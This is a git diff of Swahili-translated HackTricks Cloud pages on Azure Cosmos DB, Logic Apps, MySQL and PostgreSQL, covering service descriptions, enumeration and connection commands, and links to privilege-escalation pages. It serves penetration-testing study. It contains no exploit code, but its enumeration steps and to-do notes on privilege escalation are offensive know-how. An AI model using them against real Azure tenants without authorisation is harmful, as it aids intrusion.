@@ -215,7 +202,7 @@ mongodb://<hostname>:<port>/<database>
Katika MongoDB, unaweza kuunda hifadhidata moja au zaidi ndani ya mfano. Kila hifadhidata inatumika kama kundi la kimantiki la makusanyo na inatoa mipaka kwa ajili ya shirika na usimamizi wa rasilimali. Hifadhidata husaidia kutenganisha na kusimamia data kwa kimantiki, kama vile kwa programu au miradi tofauti.
#### Makusanyo
Kitengo cha msingi cha uhifadhi wa data katika MongoDB ni makusanyo, ambayo yanaweka hati na yameundwa kwa ajili ya uchunguzi wa ufanisi na muundo wa skimu unaoweza kubadilishwa. Makusanyo yanaweza kupanuliwa kwa urahisi na yanaweza kusaidia operesheni zenye kiwango kikubwa katika nodi nyingi katika mpangilio wa kusambazwa.
Kitengo cha msingi cha uhifadhi wa data katika MongoDB ni makusanyo, ambayo yanaweka hati na yameundwa kwa ajili ya uchunguzi mzuri na muundo wa skimu unaoweza kubadilishwa. Makusanyo yanaweza kupanuka kwa urahisi na yanaweza kusaidia operesheni zenye kiwango kikubwa katika nodi nyingi katika mpangilio wa kusambazwa.
#### Uhesabu
@@ -326,42 +313,31 @@ print(f"Inserted document with ID: {result.inserted_id}")
```
{% endcode %}
## Marejeleo
## Marejeo
* [https://learn.microsoft.com/en-us/azure/cosmos-db/choose-api](https://learn.microsoft.com/en-us/azure/cosmos-db/choose-api)
* [https://learn.microsoft.com/en-us/azure/cosmos-db/](https://learn.microsoft.com/en-us/azure/cosmos-db/)
* [https://learn.microsoft.com/en-us/azure/cosmos-db/introduction](https://learn.microsoft.com/en-us/azure/cosmos-db/introduction)
* [https://learn.microsoft.com/en-us/azure/cosmos-db/nosql/security/how-to-grant-data-plane-role-based-access?tabs=built-in-definition%2Ccsharp&pivots=azure-interface-cli](https://learn.microsoft.com/en-us/azure/cosmos-db/nosql/security/how-to-grant-data-plane-role-based-access?tabs=built-in-definition%2Ccsharp&pivots=azure-interface-cli)
## Kuinua Mamlaka
## Kuinua Privilege
{% content-ref url="../az-privilege-escalation/az-cosmosDB-privesc.md" %}
[az-cosmosDB-privesc.md](../az-privilege-escalation/az-cosmosDB-privesc.md)
{% endcontent-ref %}
## Baada ya Ukatili
## Baada ya Utekelezaji
{% content-ref url="../az-post-exploitation/az-cosmosDB-post-exploitation.md" %}
[az-cosmosDB-post-exploitation.md](../az-post-exploitation/az-sql-post-exploitation.md)
{% endcontent-ref %}
## Kufanya
## Kifanyike
* Sehemu nyingine za DB hapa, meza, cassandra, gremlin...
* Angalia baada ya ukatili "Microsoft.DocumentDB/databaseAccounts/mongodbUserDefinitions/write" && "Microsoft.DocumentDB/databaseAccounts/mongodbUserDefinitions/read" na ufafanuzi wa majukumu kwa sababu hapa kunaweza kuwa na privesc
* Angalia utekelezaji wa "Microsoft.DocumentDB/databaseAccounts/mongodbUserDefinitions/write" && "Microsoft.DocumentDB/databaseAccounts/mongodbUserDefinitions/read" na ufafanuzi wa majukumu kwa sababu hapa kunaweza kuwa na privesc
* Angalia urejeleaji
{% hint style="success" %}
Jifunze & fanya mazoezi ya AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Jifunze & fanya mazoezi ya GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **fuata** sisi kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Shiriki hila za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
{{#include ../../../banners/hacktricks-training.md}}

27
src/pentesting-cloud/azure-security/az-services/az-logic-apps.md
View File

@@ -4,13 +4,13 @@
## Basic Information
Azure Logic Apps ni huduma ya msingi ya wingu inayotolewa na Microsoft Azure ambayo inawawezesha waendelezaji **kuunda na kuendesha mifumo ya kazi inayounganisha huduma mbalimbali**, vyanzo vya data, na programu. Mifumo hii ya kazi imeundwa ili **kujiendesha kwa mchakato wa biashara**, kupanga kazi, na kufanya uunganisho wa data kati ya majukwaa tofauti.
Azure Logic Apps ni huduma ya msingi ya wingu inayotolewa na Microsoft Azure ambayo inawawezesha waendelezaji **kuunda na kuendesha workflows zinazounganisha huduma mbalimbali**, vyanzo vya data, na programu. Workflows hizi zimeundwa ili **kuandaa michakato ya biashara**, kuandaa kazi, na kufanya uunganisho wa data kati ya majukwaa tofauti.
Logic Apps inatoa mbunifu wa kuona kuunda mifumo ya kazi na **mifungamano mingi iliyojengwa awali**, ambayo inafanya iwe rahisi kuungana na kuingiliana na huduma mbalimbali, kama vile Office 365, Dynamics CRM, Salesforce, na nyingine nyingi. Unaweza pia kuunda mifungamano ya kawaida kwa mahitaji yako maalum.
Logic Apps inatoa mbunifu wa kuona kuunda workflows na **aina mbalimbali za viunganishi vilivyotengenezwa awali**, ambayo inafanya iwe rahisi kuungana na kuingiliana na huduma mbalimbali, kama vile Office 365, Dynamics CRM, Salesforce, na nyingine nyingi. Unaweza pia kuunda viunganishi vya kawaida kwa mahitaji yako maalum.
### Examples
- **Automating Data Pipelines**: Logic Apps inaweza kujiendesha **mchakato wa uhamishaji na mabadiliko ya data** kwa kushirikiana na Azure Data Factory. Hii ni muhimu kwa kuunda mifumo ya data inayoweza kupanuka na kuaminika ambayo inahamisha na kubadilisha data kati ya hifadhi mbalimbali za data, kama vile Azure SQL Database na Azure Blob Storage, kusaidia katika uchambuzi na operesheni za akili ya biashara.
- **Automating Data Pipelines**: Logic Apps inaweza kuandaa **mchakato wa uhamishaji na mabadiliko ya data** kwa kushirikiana na Azure Data Factory. Hii ni muhimu kwa kuunda mipango ya data inayoweza kupanuka na kuaminika ambayo inahamisha na kubadilisha data kati ya hifadhi mbalimbali za data, kama vile Azure SQL Database na Azure Blob Storage, kusaidia katika uchambuzi na operesheni za akili ya biashara.
- **Integrating with Azure Functions**: Logic Apps inaweza kufanya kazi pamoja na Azure Functions kuendeleza **programu za kisasa zinazoendeshwa na matukio ambazo zinaweza kupanuka kadri inavyohitajika** na kuunganishwa kwa urahisi na huduma nyingine za Azure. Mfano wa matumizi ni kutumia Logic App kuanzisha Azure Function kama jibu kwa matukio fulani, kama vile mabadiliko katika akaunti ya Azure Storage, kuruhusu usindikaji wa data wa kidinamik.
### Visualize a LogicAPP
@@ -37,7 +37,7 @@ Kuna chaguzi kadhaa za mwenyeji:
* **Consumption**
- **Multi-tenant**: inatoa rasilimali za kompyuta za pamoja, inafanya kazi katika wingu la umma, na inafuata mfano wa bei kulingana na operesheni. Hii ni bora kwa kazi nyepesi na za gharama nafuu.
* **Standard**
- **Workflow Service Plan**: rasilimali za kompyuta zilizotengwa zikiwa na uunganisho wa VNET kwa ajili ya mtandao na malipo kwa kila mfano wa mpango wa huduma za kazi. Inafaa kwa kazi zinazohitaji udhibiti zaidi.
- **Workflow Service Plan**: rasilimali za kompyuta zilizotengwa na uunganisho wa VNET kwa ajili ya mtandao na malipo kwa kila mfano wa mpango wa huduma za kazi. Inafaa kwa kazi zinazohitaji udhibiti zaidi.
- **App Service Environment V3** rasilimali za kompyuta zilizotengwa zikiwa na kutengwa kamili na uwezo wa kupanuka. Pia inajumuisha VNET kwa ajili ya mtandao na inatumia mfano wa bei kulingana na mifano ya App Service ndani ya mazingira. Hii ni bora kwa programu za kiwango cha biashara zinazohitaji kutengwa kubwa.
- **Hybrid** iliyoundwa kwa ajili ya usindikaji wa ndani na msaada wa wingu nyingi. Inaruhusu rasilimali za kompyuta zinazodhibitiwa na mteja zikiwa na ufikiaji wa mtandao wa ndani na inatumia Kubernetes Event-Driven Autoscaling (KEDA).
@@ -153,7 +153,7 @@ Get-AzLogicAppTriggerHistory -ResourceGroupName "<ResourceGroupName>" -Name "<Lo
* Washirika: Simamia taarifa za washirika wa biashara kwa ajili ya shughuli za B2B, kuwezesha uunganisho usio na mshono.
* Makubaliano: Sanidi sheria na mipangilio ya kubadilishana data na washirika wa biashara (kwa mfano, EDI, AS2).
* Mipangilio ya Kundi: Simamia mipangilio ya usindikaji wa kundi ili kuunganisha na kushughulikia ujumbe kwa ufanisi.
* RosettaNet PIP: Sanidi Mchakato wa Kiunganishi wa Washirika wa RosettaNet (PIPs) kwa ajili ya kuweka kiwango cha mawasiliano ya B2B.
* RosettaNet PIP: Sanidi Mchakato wa Kiunganishi wa RosettaNet (PIPs) kwa ajili ya kuweka kiwango cha mawasiliano ya B2B.
#### Uhesabu
@@ -261,7 +261,7 @@ Get-AzIntegrationAccountSchema -ResourceGroupName <resource-group-name> -Integra
## Kuinua Haki
Kama ilivyo kwa logic apps privesc:
Sawa na logic apps privesc:
{% content-ref url="../az-privilege-escalation/az-logic-apps-privesc.md" %}
[az-logic-apps-privesc.md](../az-privilege-escalation/az-logic-apps-privesc.md)
@@ -273,17 +273,4 @@ Kama ilivyo kwa logic apps privesc:
[az-logic-apps-post-exploitation.md](../az-post-exploitation/az-logic-apps-post-exploitation.md)
{% endcontent-ref %}
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
{{#include ../../../banners/hacktricks-training.md}}

58
src/pentesting-cloud/azure-security/az-services/az-mysql.md
View File

@@ -1,38 +1,25 @@
# Az - MySQL Databases
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
{{#include ../../../banners/hacktricks-training.md}}
## Azure MySQL
Azure Database for MySQL ni huduma ya hifadhidata ya uhusiano inayosimamiwa kikamilifu inayotegemea MySQL Community Edition, iliyoundwa kutoa upanuzi, usalama, na kubadilika kwa mahitaji mbalimbali ya programu. Ina mifano miwili tofauti ya kutekeleza:
Azure Database for MySQL ni huduma ya hifadhidata ya uhusiano inayosimamiwa kikamilifu inayotokana na MySQL Community Edition, iliyoundwa kutoa upanuzi, usalama, na kubadilika kwa mahitaji mbalimbali ya programu. Ina mifano miwili tofauti ya kutekeleza:
* **Seva Moja** (iko kwenye njia ya kustaafu):
* **Single Server** (iko kwenye njia ya kustaafu):
- Imeboreshwa kwa ajili ya kutekeleza MySQL kwa gharama nafuu na rahisi kusimamia.
- Vipengele vinajumuisha nakala za kiotomatiki, upatikanaji wa juu, na ufuatiliaji wa msingi.
- Inafaa kwa programu zenye mzigo wa kazi unaoweza kutabiriwa.
* **Seva Inayobadilika**:
- Inafaa kwa programu zenye mzigo unaoweza kutabiriwa.
* **Flexible Server**:
- Inatoa udhibiti zaidi juu ya usimamizi wa hifadhidata na usanidi.
- Inasaidia upatikanaji wa juu (katika eneo moja na eneo lililohifadhiwa).
- Inasaidia upatikanaji wa juu (sawa na eneo na eneo-lakini).
- Vipengele vinajumuisha upanuzi wa elastic, usimamizi wa patch, na kuboresha mzigo wa kazi.
- Inatoa kazi ya kusitisha/kuzindua kwa ajili ya akiba ya gharama.
### Vipengele Muhimu
* **Usimamizi wa Seva**: Kipengele cha **ad-admin** kinaruhusu kusimamia wasimamizi wa Azure Active Directory (AAD) kwa seva za MySQL, kikitoa udhibiti juu ya ufikiaji wa kiutawala kupitia akidi za AAD, wakati kipengele cha **identity** kinaruhusu ugawaji na usimamizi wa Azure Managed Identities, kikitoa uthibitisho salama, bila akidi kwa ajili ya kufikia rasilimali za Azure.
* **Usimamizi wa Mzunguko wa Maisha**: chaguzi za kuanzisha au kusitisha seva, kufuta mfano wa seva inayobadilika, kuanzisha tena seva ili haraka kutekeleza mabadiliko ya usanidi, na kusubiri kuhakikisha seva inakidhi masharti maalum kabla ya kuendelea na scripts za automatisering.
* **Usalama na Mtandao**: inaweza kusimamia sheria za moto za seva kwa ajili ya ufikiaji salama wa hifadhidata na kuondoa usanidi wa mtandao wa virtual inapohitajika.
* **Ulinzi wa Data na Nakala**: inajumuisha chaguzi za kusimamia nakala za seva inayobadilika kwa ajili ya urejeleaji wa data, kufanya geo-restore ili kurejesha seva katika eneo tofauti, kusafirisha nakala za seva kwa matumizi ya nje (katika Preview), na kurejesha seva kutoka kwa nakala hadi wakati maalum.
### Key Features
* **Server Management**: Kipengele cha **ad-admin** kinaruhusu kusimamia wasimamizi wa Azure Active Directory (AAD) kwa seva za MySQL, kikitoa udhibiti juu ya ufikiaji wa kiutawala kupitia akreditivu za AAD, wakati kipengele cha **identity** kinaruhusu ugawaji na usimamizi wa Azure Managed Identities, kikitoa uthibitisho salama, bila akreditivu kwa ajili ya kufikia rasilimali za Azure.
* **Lifecycle Management**: chaguzi za kuanzisha au kusitisha seva, kufuta mfano wa seva inayoweza kubadilishwa, kuanzisha tena seva ili haraka kutekeleza mabadiliko ya usanidi, na kusubiri kuhakikisha seva inakidhi masharti maalum kabla ya kuendelea na scripts za automatisering.
* **Security and Networking**: inaweza kusimamia sheria za firewall za seva kwa ajili ya ufikiaji salama wa hifadhidata na kuondoa usanidi wa mtandao wa virtual inapohitajika.
* **Data Protection and Backup**: inajumuisha chaguzi za kusimamia nakala za seva inayoweza kubadilishwa kwa ajili ya urejeleaji wa data, kufanya geo-restore ili kurejesha seva katika eneo tofauti, kusafirisha nakala za seva kwa matumizi ya nje (katika Preview), na kurejesha seva kutoka kwa nakala hadi wakati maalum.
### Enumeration
@@ -114,7 +101,7 @@ Get-AzMySqlFlexibleServerLog -ResourceGroupName <resource-group-name> -ServerNam
### Muunganisho
Kwa nyongeza rdbms-connect unaweza kufikia hifadhidata kwa:
Kwa nyongeza rdbms-connect unaweza kufikia hifadhidata kwa:
{% code overflow="wrap" %}
```bash
@@ -138,7 +125,7 @@ mysql -h <server-name>.mysql.database.azure.com -P 3306 -u <username> -p
```
{% endcode %}
Pia unaweza kutekeleza maswali na github lakini nenosiri na mtumiaji pia zinahitajika. Unahitaji kuandaa faili la sql lenye swali la kutekeleza na kisha:
Pia unaweza kutekeleza maswali na github lakini nenosiri na mtumiaji pia vinahitajika. Unahitaji kuandaa faili la sql lenye swali la kutekeleza na kisha:
{% code overflow="wrap" %}
```bash
# Setup
@@ -166,7 +153,7 @@ az mysql flexible-server deploy run \
[az-mysql-privesc.md](../az-privilege-escalation/az-mysql-privesc.md)
{% endcontent-ref %}
## Baada ya Kutekeleza
## Baada ya Utekelezaji
{% content-ref url="../az-post-exploitation/az-mysql-post-exploitation.md" %}
[az-sql-mysql-exploitation.md](../az-post-exploitation/az-mysql-post-exploitation.md)
@@ -174,21 +161,8 @@ az mysql flexible-server deploy run \
## Kitu cha Kufanya
* Tafuta njia ya kufikia na mysql flexible-server ad-admin ili kuthibitisha ni njia ya kuinua haki
* Tafuta njia ya kupata ufikiaji na mysql flexible-server ad-admin ili kuthibitisha ni njia ya kuinua haki
{% hint style="success" %}
Jifunze & fanya mazoezi ya AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Jifunze & fanya mazoezi ya GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
{{#include ../../../banners/hacktricks-training.md}}

38
src/pentesting-cloud/azure-security/az-services/az-postgresql.md
View File

@@ -1,19 +1,6 @@
# Az - PostgreSQL Databases
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
{{#include ../../../banners/hacktricks-training.md}}
## Azure PostgreSQL
**Azure Database for PostgreSQL** ni huduma ya **database ya uhusiano inayosimamiwa kikamilifu inayotegemea PostgreSQL** Community Edition. Imeundwa kutoa upanuzi, usalama, na kubadilika kwa mahitaji mbalimbali ya programu. Kama ilivyo kwa Azure MySQL, PostgreSQL inatoa mifano miwili ya kutekeleza:
@@ -33,9 +20,9 @@ Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).p
* **Dirisha la Matengenezo la Kijadi**: Panga masasisho ili kupunguza usumbufu.
* **Ufuatiliaji wa Kazi**: Fikia metriki na kumbukumbu za kina ili kufuatilia na kuboresha utendaji wa database.
* **Stop/Start Server**: Watumiaji wanaweza kusitisha na kuanzisha seva.
* **Nakala za Otomatiki**: Nakala za kila siku zilizojengwa ndani na muda wa uhifadhi unaoweza kubadilishwa hadi siku 35.
* **Nakala za Otomatiki**: Nakala za kila siku zilizojengwa ndani zikiwa na muda wa uhifadhi unaoweza kubadilishwa hadi siku 35.
* **Upatikanaji Kulingana na Majukumu**: Dhibiti ruhusa za watumiaji na upatikanaji wa kiutawala kupitia Azure Active Directory.
* **Usalama na Mtandao**: inaweza kusimamia sheria za firewall za seva kwa upatikanaji salama wa database na kuondoa usanidi wa mtandao wa virtual inapohitajika.
* **Usalama na Mtandao**: inaweza kusimamia sheria za firewall za seva kwa ajili ya ufikiaji salama wa database na kuondoa usanidi wa mtandao wa virtual inapohitajika.
### Enumeration
@@ -110,7 +97,7 @@ Get-AzPostgreSqlServer -ResourceGroupName <resource-group-name>
### Muunganisho
Kwa nyongeza rdbms-connect unaweza kufikia hifadhidata kwa:
Kwa nyongeza rdbms-connect unaweza kufikia hifadhidata kwa:
{% code overflow="wrap" %}
```bash
@@ -154,20 +141,7 @@ psql -h testpostgresserver1994.postgres.database.azure.com -p 5432 -U adminuser
## ToDo
* Angalia njia ya kupata ufikiaji na ad-admin ili kuthibitisha ni njia ya privesc
* Tafuta njia ya kupata ufikiaji na ad-admin ili kuthibitisha ni mbinu ya privesc
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}
{{#include ../../../banners/hacktricks-training.md}}